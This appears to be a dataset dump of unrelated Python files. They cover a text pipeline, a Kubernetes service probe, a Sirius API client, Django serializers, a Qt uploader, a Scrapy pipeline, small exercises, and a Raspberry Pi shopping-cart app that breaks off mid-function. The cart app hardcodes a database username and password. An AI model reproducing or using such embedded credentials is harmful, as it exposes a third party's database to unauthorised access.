(%s,%s,%s,%s,%s)',prame)\r\nexcel_to_db('2020年每个月的销售情况.xlsx',12)","sub_path":"excel to db.py","file_name":"excel to db.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"482059879","text":"\"\"\"\nPipeline for text processing implementation\n\"\"\"\n\nfrom pymystem3 import Mystem\nfrom article import Article\nimport os\nimport re\nfrom pathlib import Path\nfrom typing import List\nfrom constants import ASSETS_PATH\n\n\nclass EmptyDirectoryError(Exception):\n \"\"\"\n Custom error\n \"\"\"\n\n\nclass InconsistentDatasetError(Exception):\n \"\"\"\n Custom error\n \"\"\"\n\n\nclass UnknownDatasetError(Exception):\n \"\"\"\n Custom error\n \"\"\"\n\n\nclass MorphologicalToken:\n \"\"\"\n Stores language params for each processed token\n \"\"\"\n def __init__(self, original_word, normalized_form):\n self.original_word = original_word\n self.normalized_form = normalized_form\n self.mystem_tags = ''\n self.pymorphy_tags = ''\n\n def __str__(self):\n return self.normalized_form\n\n\nclass CorpusManager:\n \"\"\"\n Works with articles and stores them\n \"\"\"\n def __init__(self, path_to_raw_txt_data: str):\n self.path_to_raw_txt_data = path_to_raw_txt_data\n self._storage = {}\n\n def _scan_dataset(self):\n \"\"\"\n Register each dataset entry\n \"\"\"\n files = os.listdir(self.path_to_raw_txt_data)\n for file in files:\n ind_underscore = file.index('_')\n is_raw_txt = re.match(r'.+_raw\\.txt', file)\n if is_raw_txt:\n self._storage[int(file[:ind_underscore])] = Article(url=None, article_id=int(file[:ind_underscore]))\n return None\n\n def get_articles(self):\n \"\"\"\n Returns storage params\n \"\"\"\n self._scan_dataset()\n return self._storage.values()\n\n\nclass TextProcessingPipeline:\n \"\"\"\n Process articles from corpus manager\n \"\"\"\n def __init__(self, corpus_manager: CorpusManager):\n self.corpus_manager = corpus_manager\n\n def run(self):\n \"\"\"\n Runs pipeline process scenario\n \"\"\"\n articles = self.corpus_manager.get_articles()\n for article in articles:\n raw_text_article = article.get_raw_text()\n result = Mystem().analyze(raw_text_article)\n tokens = self._process(mystem_analize_result=result) # list with instances MorphToken\n processed_text_tokens = []\n for token in tokens:\n processed_text_tokens.append('{}<{}>'.format(token.__str__(), token.mystem_tags))\n processed_text = ' '.join(processed_text_tokens)\n article.save_processed(processed_text)\n return None\n\n def _process(self, mystem_analize_result) -> List[type(MorphologicalToken)]:\n \"\"\"\n Performs processing of each text\n \"\"\"\n tokens = []\n for element in mystem_analize_result:\n if element.get('analysis') is None:\n continue\n if not element.get('analysis'):\n token = MorphologicalToken(original_word=element['text'], normalized_form=element['text'])\n else:\n token = MorphologicalToken(original_word=element['text'],\n normalized_form=element['analysis'][0].get('lex'))\n token.mystem_tags = '{}'.format(element['analysis'][0].get('gr'))\n tokens.append(token)\n return tokens\n\n\ndef validate_dataset(path_to_validate):\n \"\"\"\n Validates folder with assets\n \"\"\"\n path = Path(path_to_validate)\n\n if not path.exists():\n raise FileNotFoundError\n\n if not path.is_dir():\n raise NotADirectoryError\n\n if not list(path.iterdir()):\n raise EmptyDirectoryError\n\n \ndef main():\n print('Your code goes here')\n validate_dataset(ASSETS_PATH)\n corpus_manager = CorpusManager(path_to_raw_txt_data=ASSETS_PATH)\n pipeline = TextProcessingPipeline(corpus_manager=corpus_manager)\n pipeline.run()\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"514072838","text":"from chaoslib.exceptions import ActivityFailed\nfrom chaoslib.types import Secrets\nfrom kubernetes import client\nfrom logzero import logger\n\nfrom chaosk8s import create_k8s_api_client\n\n__all__ = [\"service_is_initialized\"]\n\n\ndef service_is_initialized(\n name: str = None,\n ns: str = \"default\",\n label_selector: str = None,\n secrets: Secrets = None,\n) -> bool:\n \"\"\"\n Lookup a service endpoint by its name and raises :exc:`FailedProbe` when\n the service was not found or not initialized.\n \"\"\"\n api = create_k8s_api_client(secrets)\n\n v1 = client.CoreV1Api(api)\n\n if name and not label_selector:\n logger.debug(f\"Filtering services by name {name}\")\n ret = v1.list_namespaced_service(ns, field_selector=f\"metadata.name={name}\")\n logger.debug(f\"Found {len(ret.items)} service(s) named '{name}' in ns '{ns}'\")\n elif label_selector and not name:\n logger.debug(f\"Filtering services by label {label_selector}\")\n ret = v1.list_namespaced_service(ns, label_selector=label_selector)\n logger.debug(\n f\"Found {len(ret.items)} service(s) in ns '{ns}'\"\n \" labelled '{label_selector}'\"\n )\n elif name and label_selector:\n logger.debug(f\"Filtering services by name {name} and label {label_selector}\")\n ret = v1.list_namespaced_service(\n ns,\n field_selector=f\"metadata.name={name}\",\n label_selector=label_selector,\n )\n logger.debug(\n f\"Found {len(ret.items)} service(s) named '{name}' and labelled\"\n f\" '{label_selector}' in ns '{ns}'\"\n )\n else:\n ret = v1.list_namespaced_service(ns)\n logger.debug(f\"Found {len(ret.items)} service(s) in ns '{ns}'\")\n\n if not ret.items:\n raise ActivityFailed(f\"service '{name}' is not initialized\")\n\n return True\n","sub_path":"chaosk8s/service/probes.py","file_name":"probes.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"41814026","text":"import re\n\ndef searchLinks(f):\n\tres = \"\"\n\tif (f.find(\"@\") != -1):\n\t\tres = \"[контакты запрещены] \"\n\telif ((f.find(\"//\") != -1) or ((f.find(\"www\") != -1) and (f.find(\".\") != -1) and (f.find(\"www\") < f.find(\".\"))) or (f.find(\".ru\") != -1) or (f.find(\".com\") != -1) or (f.find(\".рф\") != -1) or (f.find(\".net\") != -1)): #и другие домены верхнего уровня\n\t\tres = \"[ссылка запрещена] \"\n\telif (len(f) > 3 and f.isdigit() == True):\n\t\tres = \"\"\n\telse:\n\t\tres = f+\" \"\n\n\treturn res\n\ndef start():\n\tfl = \"y\"\n\twhile (fl == \"y\"):\n\t\tstring = input(\"Введите строку: \")\n\t\tstring = string.lower()\n\t\tmass = string.split(\" \")\n\t\tmass[0] = mass[0].capitalize()\n\t\tres = \"\"\n\n\t\tfor i in mass:\n\t\t\tel = searchLinks(i)\n\t\t\tres += el\n\n\t\tprint(res)\n\t\tfl = input(\"Продолжить? (y / n): \")\n\nstart()","sub_path":"1__2__Parser/main_Func.py","file_name":"main_Func.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"256450374","text":"import datetime\nimport json\nfrom urllib.parse import urlencode, quote\n\nimport boto3\nimport jwt\nimport localstack_client.session\nimport requests\nfrom botocore.exceptions import ClientError\n\n# from ..api.helpers import custom_logger\n\n# logger = custom_logger(\"opg_sirius_service\")\nimport logging\n\nlogger = logging\n\n\nclass SiriusService:\n def __init__(self, config_params, cache):\n\n try:\n self.cache = cache\n self.sirius_base_url = config_params.SIRIUS_BASE_URL\n self.environment = config_params.ENVIRONMENT\n self.session_data = config_params.SESSION_DATA\n self.request_caching = (\n config_params.REQUEST_CACHING if cache else \"disabled\"\n )\n self.request_caching_name = (\n config_params.REQUEST_CACHE_NAME\n if config_params.REQUEST_CACHE_NAME\n else \"default_sirius_cache\"\n )\n self.request_caching_ttl = (\n config_params.REQUEST_CACHING_TTL\n if config_params.REQUEST_CACHING_TTL\n else 48\n )\n except Exception as e:\n logger.info(f\"Error loading config e: {e}\")\n\n def build_sirius_url(self, endpoint, url_params=None):\n \"\"\"\n Builds the url for the endpoint from variables (probably saved in env vars)\n\n Args:\n base_url: URL of the Sirius server\n api_route: path to public api\n endpoint: endpoint\n Returns:\n string: url\n \"\"\"\n\n base_url = self.sirius_base_url\n\n sirius_url = f\"{base_url}/{quote(endpoint)}\"\n\n if url_params:\n encoded_params = urlencode(url_params)\n url = f\"{sirius_url}?{encoded_params}\"\n else:\n url = sirius_url\n\n return url\n\n def _get_secret(self):\n \"\"\"\n Gets and decrypts the JWT secret from AWS Secrets Manager for the chosen environment\n This was c&p directly from AWS Secrets Manager...\n\n Args:\n environment: AWS environment name\n Returns:\n JWT secret\n Raises:\n ClientError\n \"\"\"\n\n environment = self.environment\n secret_name = f\"{environment}/jwt-key\"\n region_name = \"eu-west-1\"\n\n if environment == \"local\": # pragma: no cover\n logger.info(\"Using local AWS Secrets Manager\") # pragma: no cover\n current_session = localstack_client.session.Session() # pragma: no cover\n\n else:\n current_session = boto3.session.Session()\n\n client = current_session.client(\n service_name=\"secretsmanager\", region_name=region_name\n )\n\n try:\n get_secret_value_response = client.get_secret_value(SecretId=secret_name)\n secret = get_secret_value_response[\"SecretString\"]\n except ClientError as e:\n logger.info(f\"Unable to get secret from Secrets Manager {e}\")\n raise e\n\n return secret\n\n def _build_sirius_headers(self, content_type=\"application/json\"):\n \"\"\"\n Builds headers for Sirius request, including JWT auth\n\n Args:\n content_type: string, defaults to 'application/json'\n Returns:\n Header dictionary with content type and auth token\n \"\"\"\n\n if not content_type:\n content_type = \"application/json\"\n\n session_data = self.session_data\n\n encoded_jwt = jwt.encode(\n {\n \"session-data\": session_data,\n \"iat\": datetime.datetime.utcnow(),\n \"exp\": datetime.datetime.utcnow() + datetime.timedelta(seconds=3600),\n },\n self._get_secret(),\n algorithm=\"HS256\",\n )\n\n return {\n \"Content-Type\": content_type,\n \"Authorization\": \"Bearer \" + encoded_jwt.decode(\"UTF8\"),\n }\n\n def _handle_sirius_error(\n self, error_code=None, error_message=None, error_details=None\n ):\n error_code = error_code if error_code else 500\n error_message = (\n error_message if error_message else \"Unknown error talking to \" \"Sirius\"\n )\n\n try:\n error_details = error_details[\"detail\"]\n\n except (KeyError, TypeError):\n error_details = (\n str(error_details) if len(str(error_details)) > 0 else \"None\"\n )\n\n message = f\"{error_message}, details: {str(error_details)}\"\n logger.error(message)\n return error_code, message\n\n def check_sirius_available(self):\n healthcheck_url = f\"{self.sirius_base_url}/api/health-check\"\n r = requests.get(url=healthcheck_url)\n\n return True if r.status_code == 200 else False\n # return True\n\n def check_cache_available(self):\n try:\n return self.cache.ping()\n except Exception as e:\n logger.error(f\"Unable to connect to cache: {e}\")\n return False\n\n def send_request_to_sirius(self, key, url, method, content_type=None, data=None):\n\n cache_enabled = True if self.request_caching == \"enabled\" else False\n\n if self.check_sirius_available():\n sirius_status_code, sirius_data = self._get_data_from_sirius(\n url, method, content_type, data\n )\n logger.info(f\"sirius_status_code: {sirius_status_code}\")\n logger.info(f\"cache_enables: {cache_enabled}\")\n logger.info(f\"method: {method}\")\n if cache_enabled and method == \"GET\" and sirius_status_code == 200:\n logger.info(f\"Putting data in cache with key: {key}\")\n self._put_sirius_data_in_cache(key=key, data=sirius_data)\n\n return sirius_status_code, sirius_data\n else:\n if cache_enabled and method == \"GET\":\n logger.info(f\"Getting data from cache with key: {key}\")\n sirius_status_code, sirius_data = self._get_sirius_data_from_cache(\n key=key\n )\n\n return sirius_status_code, sirius_data\n else:\n return self._handle_sirius_error(\n error_message=f\"Unable to send request to Sirius\",\n error_details=f\"Sirius not available\",\n )\n\n def _get_data_from_sirius(self, url, method, content_type=None, data=None):\n logger.info(\"_get_data_from_sirius\")\n headers = self._build_sirius_headers(content_type)\n\n try:\n if method == \"PUT\":\n r = requests.put(url=url, data=data, headers=headers)\n return r.status_code, r.json()\n\n elif method == \"POST\":\n r = requests.post(url=url, data=data, headers=headers)\n if r.status_code == 204:\n return r.status_code, \"\"\n\n return r.status_code, r.json()\n elif method == \"GET\":\n r = requests.get(url=url, headers=headers)\n\n return r.status_code, r.json()\n else:\n return self._handle_sirius_error(\n error_message=f\"Unable to send request to Sirius\",\n error_details=f\"Method {method} not allowed on Sirius route\",\n )\n\n except Exception as e:\n return self._handle_sirius_error(\n error_message=f\"Unable to send request to Sirius\", error_details=e\n )\n\n def _put_sirius_data_in_cache(self, key, data):\n logger.info(f\"_put_sirius_data_in_cache\")\n cache_name = self.request_caching_name\n\n cache_ttl_in_seconds = self.request_caching_ttl * 60 * 60\n\n data = json.dumps(data)\n\n try:\n self.cache.set(\n name=f\"{cache_name}-{key}\", value=data, ex=cache_ttl_in_seconds\n )\n logger.info(f\"setting redis: {cache_name}-{key}\")\n except Exception as e:\n logger.error(f\"Unable to set cache: {cache_name}-{key}, error {e}\")\n\n def _get_sirius_data_from_cache(self, key):\n\n cache_name = self.request_caching_name\n\n try:\n logger.info(f\"getting redis: {cache_name}-{key}\")\n if self.cache.exists(f\"{cache_name}-{key}\"):\n status_code = 200\n result = self.cache.get(f\"{cache_name}-{key}\")\n result = json.loads(result)\n else:\n status_code = 500\n result = None\n except Exception as e:\n logger.error(f\"Unable to get from cache: {cache_name}-{key}, error {e}\")\n status_code = 500\n result = None\n\n return status_code, result\n","sub_path":"shared_code/sirius_service/opg_sirius_service/sirius_handler.py","file_name":"sirius_handler.py","file_ext":"py","file_size_in_byte":8685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574995282","text":"'''\nGiven an array of size n, find the majority element. The majority element is the element that appears more than n/2 times.\n\nYou may assume that the array is non-empty and the majority element always exist in the array.\n\nExample 1:\n\nInput: [3,2,3]\nOutput: 3\nExample 2:\n\nInput: [2,2,1,1,1,2,2]\nOutput: 2\n'''\n\n# 0 (nlogn) 0(1)\ndef sol1(arr):\n arr.sort()\n return arr[len(arr)/2]\n\n# 0(n) 0(1)\ndef sol2(arr):\n count = 0\n for val in arr:\n if count == 0:\n candidate = val\n count += (1 if val == candidate else -1)\n return candidate\n\narr = [2,2,1,1,1,2,2]\nprint(sol1(arr))\nprint(sol2(arr))","sub_path":"Easy/majority_element.py","file_name":"majority_element.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"493144727","text":"from rest_framework import serializers\nfrom Province.models import Province\nfrom district.models import District\nfrom city.models import City\n\n\nclass ProvinceSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Province\n fields = ('pk',\n 'introduction',\n 'sinhalaName',\n 'englishName',\n 'tamilName',\n 'area',\n 'featureImage',\n 'mapUrl')\n\n featureImage = serializers.CharField(max_length=255, allow_blank=True)\n\n\n# province serialzer by district\nclass RelatedProvinceSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Province\n fields = ('pk',\n 'englishName',)\n\n\nclass DistrictSerializer(serializers.ModelSerializer):\n\n province = RelatedProvinceSerializer()\n featureImage = serializers.CharField(max_length=255, allow_blank=True)\n\n class Meta:\n model = District\n fields = ('pk',\n 'introduction',\n 'province',\n 'sinhalaName',\n 'englishName',\n 'tamilName',\n 'area',\n 'featureImage',\n 'mapUrl')\n\n\nclass CitySerializers(serializers.ModelSerializer):\n\n class Meta:\n model = City\n fields = ('pk',\n 'introduction',\n 'sinhalaName',\n 'englishName',\n 'tamilName',\n 'area',\n 'featureImage',\n 'mapUrl',\n 'district')\n","sub_path":"api/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"511704541","text":"# -*- coding=UTF-8 -*-\n\"\"\"Upload files to server. \"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport webbrowser\n\nfrom Qt.QtCore import QEvent, Qt, Signal\nfrom Qt.QtWidgets import QStyle\n\nfrom wlf.uitools.template.dialog_with_dir import DialogWithDir\n\nfrom . import filetools\nfrom .__about__ import __version__\nfrom .control import Controller\nfrom .util import CONFIG\n\n\nclass Dialog(DialogWithDir):\n \"\"\"Main GUI dialog. \"\"\"\n\n instance = None\n upload_finished = Signal()\n icons = {\n 'toolButtonOpenDir': QStyle.SP_DirOpenIcon,\n 'dirButton': QStyle.SP_DialogOpenButton,\n 'syncButton': QStyle.SP_FileDialogToParent,\n None: QStyle.SP_FileDialogToParent,\n }\n uifile = filetools.path('dialog.ui')\n\n def __init__(self, parent=None):\n\n DialogWithDir.__init__(self, config=CONFIG, parent=parent)\n self.is_uploading = False\n self.version_label.setText('v{}'.format(__version__))\n\n # Set controller\n self.controller = Controller(self)\n self.controller.widget = self\n self.listView.setModel(self.controller.model)\n\n # Signals\n self.dirEdit.textChanged.connect(self.controller.change_root)\n self.listView.clicked.connect(self.on_view_item_clicked)\n self.listView.doubleClicked.connect(self.on_view_item_double_clicked)\n\n self.comboBoxPipeline.currentIndexChanged.connect(\n lambda index: self.on_pipeline_changed(self.comboBoxPipeline.itemText(index)))\n\n self.actionDir.triggered.connect(self.ask_dir)\n self.actionSync.triggered.connect(self.on_action_sync)\n self.actionSelectAll.triggered.connect(\n self.controller.select_all)\n self.actionReverseSelection.triggered.connect(\n self.controller.reverse_selection)\n self.actionReset.triggered.connect(\n self.controller.update_model)\n self.actionOpenDir.triggered.connect(\n lambda: webbrowser.open(CONFIG['DIR']))\n\n self.controller.root_changed.connect(self.on_root_changed)\n self.controller.upload_started.connect(self.on_upload_started)\n self.controller.upload_finished.connect(self.on_upload_finished)\n self.controller.model.dataChanged.connect(self.on_data_changed)\n\n # Recover state.\n self.controller.pipeline = CONFIG['PIPELINE']\n self.controller.change_root(self.directory)\n\n def on_action_sync(self):\n self.controller.upload(\n self.checkBoxSubmit.checkState(),\n self.lineEditNote.text())\n self.lineEditNote.clear()\n\n def _edits_key(self):\n return {\n 'dirEdit': 'DIR',\n 'checkBoxSubmit': 'IS_SUBMIT',\n 'checkBoxBurnIn': 'IS_BURN_IN',\n 'comboBoxPipeline': 'PIPELINE',\n }\n\n @property\n def dir_edit(self):\n \"\"\"Line edit for dir input. \"\"\"\n\n return self.dirEdit\n\n def on_root_changed(self, value):\n self.directory = value\n self.listView.setRootIndex(self.controller.source_index(value))\n\n def on_view_item_clicked(self, index):\n pass\n\n def on_view_item_double_clicked(self, index):\n if self.controller.model.is_dir(index):\n self.controller.change_root(index)\n else:\n self.controller.open_index(index, self.checkBoxBurnIn.checkState())\n\n def on_pipeline_changed(self, pipeline):\n self.controller.change_pipeline(pipeline)\n\n def on_data_changed(self):\n model = self.controller.model\n states = [model.data(i, Qt.CheckStateRole) for i in model.indexes()]\n checked_count = len([i for i in states if i == Qt.Checked])\n total_count = len(states)\n self.labelCount.setText('{}/{}'.format(checked_count, total_count))\n self.syncButton.setEnabled(not self.is_uploading and checked_count)\n\n def on_upload_started(self):\n self.is_uploading = True\n self.syncButton.setEnabled(False)\n\n def on_upload_finished(self):\n self.is_uploading = False\n self.activateWindow()\n\n def event(self, event):\n \"\"\"Override. \"\"\"\n\n if event.type() == QEvent.StatusTip:\n self.statusBar.showMessage(event.tip())\n return super(Dialog, self).event(event)\n","sub_path":"cgtwq_uploader/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"286683596","text":"def replaceSpaceWithPacent20(string):\n spaceCount = 0\n for ch in string:\n if (ch==\" \"):\n spaceCount += 1\n table = [None]*(len(string)+spaceCount*2)\n i = 0\n for ch in string:\n if (ch != \" \"):\n table[i] = ch\n i += 1\n else:\n table[i] = \"%\"\n table[i+1] = \"2\"\n table[i+2] = \"0\"\n i += 3\n return \"\".join(table)\n\nif __name__ == \"__main__\":\n print(replaceSpaceWithPacent20(\"Mr John Smith \"))\n ","sub_path":"AlgorithmStudy/1-3.py","file_name":"1-3.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"447964470","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport csv\n\nfrom .items import XnkbItem, XnksItem, XnzyItem\n\n\nclass XnPipeline(object):\n # 定义一个集合去重\n # self.wys = set()\n\n def __init__(self):\n # 打开文件,指定方式为写,利用newline=''参数把csv写数据时产生的空行消除\n self.file_xnkb = open('XNKB.csv', 'w', newline='', encoding='utf-8-sig')\n self.file_xnks = open('XNKS.csv', 'w', newline='', encoding='utf-8-sig')\n self.file_xnzy = open('XNZY.csv', 'w', newline='', encoding='utf-8-sig')\n # 设置文件第一行的字段名,注意要跟spider传过来的字典item的key名称相同\n self.fieldnames_xnkb = ['Class', 'Component', 'Section', 'Mode', 'Day', 'Time', 'Facility',\n 'Location', 'Weeks', 'Instructor']\n self.fieldnames_xnks = ['Day', 'Date', 'StartTime', 'EndTime', 'Course', 'Paper', 'Location', 'Materials']\n self.fieldnames_xnzy = ['title', 'time', 'name']\n # 指定文件的写入方式为csv字典写入,参数1为指定具体文件,参数2为指定字段名\n self.writer_xnkb = csv.DictWriter(self.file_xnkb, fieldnames=self.fieldnames_xnkb)\n self.writer_xnks = csv.DictWriter(self.file_xnks, fieldnames=self.fieldnames_xnks)\n self.writer_xnzy = csv.DictWriter(self.file_xnzy, fieldnames=self.fieldnames_xnzy)\n # 写入第一行字段名,因为只要写入一次,所以文件放在__init__里面\n self.writer_xnkb.writeheader()\n self.writer_xnks.writeheader()\n self.writer_xnzy.writeheader()\n\n def process_item(self, item, spider):\n # content = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n # self.file.write(content)\n # 写入spider传过来的具体数值\n if isinstance(item, XnkbItem):\n\n self.writer_xnkb.writerow(item)\n\n elif isinstance(item, XnksItem):\n\n self.writer_xnks.writerow(item)\n\n elif isinstance(item, XnzyItem):\n\n self.writer_xnzy.writerow(item)\n\n return item\n\n def __del__(self):\n self.file_xnkb.close()\n self.file_xnks.close()\n self.file_xnzy.close()\n","sub_path":"XN/XN/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"33863493","text":"import pygame\r\nimport numpy as np\r\nimport time\r\nimport io\r\nimport os\r\nimport sys\r\nimport socket\r\nimport serial\r\nimport threading\r\nimport scipy.misc\r\nimport pyodbc\r\nimport requests\r\nimport RPi.GPIO as GPIO\r\nfrom PIL import Image\r\nfrom picamera import PiCamera\r\n\r\nSWITCH=20\r\nENTER=21\r\nGPIO.setmode(GPIO.BCM)\r\nGPIO.setup(SWITCH, GPIO.IN)\r\nGPIO.setup(ENTER, GPIO.IN)\r\nPyTorch_REST_API_URL = 'http://7c605c99.ngrok.io/predict'\r\nprint(\"out here\")\r\ndsn = 'rpitestsqlserverdatasource'\r\nuser = 'deng-fat@deng-fat-goshopping'\r\npassword = 'TJG1ul3au4a83'\r\ndatabase = 'Shopping_Mall_Example'\r\nconnString = 'DSN={0};UID={1};PWD={2};DATABASE={3};'.format(dsn,user,password,database)\r\nconn = pyodbc.connect(connString)\r\ncursor = conn.cursor()\r\ntry:\r\n # Python2\r\n from urllib2 import urlopen\r\nexcept ImportError:\r\n # Python3\r\n from urllib.request import urlopen\r\n\r\n# machine params \r\nos.environ['SDL_VIDEO_WINDOW_POS'] = '8, 30'\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 680\r\nMystate = 0\r\n# params\r\nHEIGHT = SCREEN_HEIGHT - 75\r\nWIDTH = HEIGHT * 4 // 3#SCREEN_WIDTH - 16\r\nmy_pos = None\r\nitem_now = None\r\nitem_list = [ ['', 0, 0] for i in range(0, 21)]\r\ntotal = 0\r\n\r\n#background image\r\nhome_bg = pygame.image.load('pictures/home_bg.png')\r\nmap_bg = pygame.image.load('pictures/map_bg.png')\r\ncar_bg = pygame.image.load('pictures/car_bg.png')\r\ninfo_bg = pygame.image.load('pictures/info_bg.png')\r\ncab1_bg = pygame.image.load('pictures/cab1_bg.png')\r\ncab2_bg = pygame.image.load('pictures/cab2_bg.png')\r\ncab3_bg = pygame.image.load('pictures/cab3_bg.png')\r\ncab4_bg = pygame.image.load('pictures/cab4_bg.png')\r\n\r\n#item icon\r\nscan_true = pygame.image.load('pictures/item_scan1.png')\r\nscan_false = pygame.image.load('pictures/item_scan0.png')\r\npos_true = pygame.image.load('pictures/item_pos1.png')\r\npos_false = pygame.image.load('pictures/item_pos0.png')\r\ninfo_true = pygame.image.load('pictures/item_info1.png')\r\ninfo_false = pygame.image.load('pictures/item_info0.png')\r\nmap_true = pygame.image.load('pictures/item_map1.png')\r\nmap_false = pygame.image.load('pictures/item_map0.png')\r\ncar_true = pygame.image.load('pictures/item_car1.png')\r\ncar_false = pygame.image.load('pictures/item_car0.png')\r\naddcar_true = pygame.image.load('pictures/item_addcar1.png')\r\naddcar_false = pygame.image.load('pictures/item_addcar0.png')\r\ncab_true = pygame.image.load('pictures/item_shelf1.png')\r\ncab_false = pygame.image.load('pictures/item_shelf0.png')\r\nhome_true = pygame.image.load('pictures/item_home1.png')\r\nhome_false = pygame.image.load('pictures/item_home0.png')\r\nmy_icon = pygame.image.load('pictures/my.png')\r\ngoal_icon = pygame.image.load('pictures/goal.png')\r\n\r\ndef keyboard_control():\r\n signal = 0\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_UP]:\r\n signal = command['UP']\r\n elif keys[pygame.K_RIGHT]:\r\n signal = command['RIGHT']\r\n return signal\r\n \r\n\r\n \r\ndef Home():\r\n #Home page: can go to scan, pos, map, car items\r\n\r\n global Mystate, windowSurface\r\n # some definition\r\n Home_state = {'SCAN': 0, 'MAP': 1, 'CAR': 2, 'POS': 3}\r\n\r\n Mystate = 0 #reset mystate\r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface\r\n while True:\r\n #get keyboard input\r\n pygame.time.wait(100)\r\n if GPIO.input(ENTER) == 0:#enter\r\n if Mystate == Home_state['SCAN']:\r\n Scan()\r\n elif Mystate == Home_state['MAP']:\r\n Map()\r\n elif Mystate == Home_state['CAR']:\r\n Car()\r\n elif Mystate == Home_state['POS']:\r\n Pos()\r\n elif GPIO.input(SWITCH) == 0:#switch\r\n Mystate = (Mystate+1)%4\r\n\r\n #init items\r\n background = home_bg\r\n scan_icon = scan_true if Mystate == Home_state['SCAN'] else scan_false\r\n map_icon = map_true if Mystate == Home_state['MAP'] else map_false\r\n car_icon = car_true if Mystate == Home_state['CAR'] else car_false\r\n pos_icon = pos_true if Mystate == Home_state['POS'] else pos_false\r\n font = pygame.font.SysFont(\"arial\", 30)\r\n if Mystate == Home_state['SCAN']:\r\n text = font.render(\"scan item\", True, (50,50,50))\r\n elif Mystate == Home_state['MAP']:\r\n text = font.render(\"check map\", True, (50,50,50))\r\n elif Mystate == Home_state['CAR']:\r\n text = font.render(\"check cart\", True, (50,50,50))\r\n elif Mystate == Home_state['POS']:\r\n text = font.render(\"get position\", True, (50,50,50))\r\n \r\n # build surface\r\n windowSurface.blit(background, (0, 0))\r\n windowSurface.blit(scan_icon, (200, 505))\r\n windowSurface.blit(map_icon, (300, 495))\r\n windowSurface.blit(car_icon, (400, 500))\r\n windowSurface.blit(pos_icon, (500, 500))\r\n windowSurface.blit(text, (600, 500))\r\n pygame.display.update()\r\n pygame.event.pump()\r\n\r\ndef Map():\r\n #Map page: can go to pos, info, cabinet, home items\r\n\r\n global Mystate, windowSurface, goal, my_pos\r\n # some definition\r\n Map_state = {'HOME': 0, 'INFO': 1, 'CAB': 2, 'POS': 3}\r\n\r\n Mystate = 0 #reset mystate\r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface\r\n while True:\r\n #get keyboard input\r\n pygame.time.wait(100)\r\n if GPIO.input(ENTER) == 0:\r\n if Mystate == Map_state['HOME']:\r\n my_pos = None\r\n Home()\r\n elif Mystate == Map_state['INFO']:\r\n my_pos = None\r\n Info()\r\n elif Mystate == Map_state['CAB']:\r\n Cab()\r\n elif Mystate == Map_state['POS']:\r\n my_pos = None\r\n Pos()\r\n elif GPIO.input(SWITCH) == 0:\r\n Mystate = (Mystate+1)%4\r\n #check whether the goal is exist\r\n if item_now is None:\r\n if Mystate == Map_state['INFO'] or Mystate == Map_state['CAB']:\r\n Mystate = Map_state['POS']\r\n\r\n #init items\r\n background = map_bg\r\n home_icon = home_true if Mystate == Map_state['HOME'] else home_false\r\n info_icon = info_true if Mystate == Map_state['INFO'] else info_false\r\n cab_icon = cab_true if Mystate == Map_state['CAB'] else cab_false\r\n pos_icon = pos_true if Mystate == Map_state['POS'] else pos_false\r\n font = pygame.font.SysFont(\"arial\", 25)\r\n if Mystate == Map_state['HOME']:\r\n text = font.render(\"Home\", True, (0,0,225))\r\n elif Mystate == Map_state['INFO']:\r\n text = font.render(\"item information\", True, (0,0,225))\r\n elif Mystate == Map_state['CAB']:\r\n text = font.render(\"see the cabinet\", True, (0,0,225))\r\n elif Mystate == Map_state['POS']:\r\n text = font.render(\"get position\", True, (0,0,225))\r\n \r\n # build surface\r\n windowSurface.blit(background, (0, 0))\r\n windowSurface.blit(home_icon, (200, 500))\r\n if item_now is not None:\r\n windowSurface.blit(info_icon, (300, 500))\r\n windowSurface.blit(cab_icon, (400, 500))\r\n windowSurface.blit(goal_icon, (item_now[6], item_now[7]))\r\n if my_pos is not None:\r\n windowSurface.blit(my_icon, (my_pos[0], my_pos[1]))\r\n windowSurface.blit(pos_icon, (500, 500))\r\n windowSurface.blit(text, (600, 500))\r\n pygame.display.update()\r\n pygame.event.pump()\r\n\r\n \r\ndef Scan():\r\n global item_now\r\n global Mystate, windowSurface\r\n # some definition\r\n Mystate = 0 #reset mystate\r\n \r\n with PiCamera() as camera:\r\n camera.start_preview()\r\n \r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface.\r\n pygame.display.update()\r\n pygame.event.pump()\r\n \r\n while True:\r\n 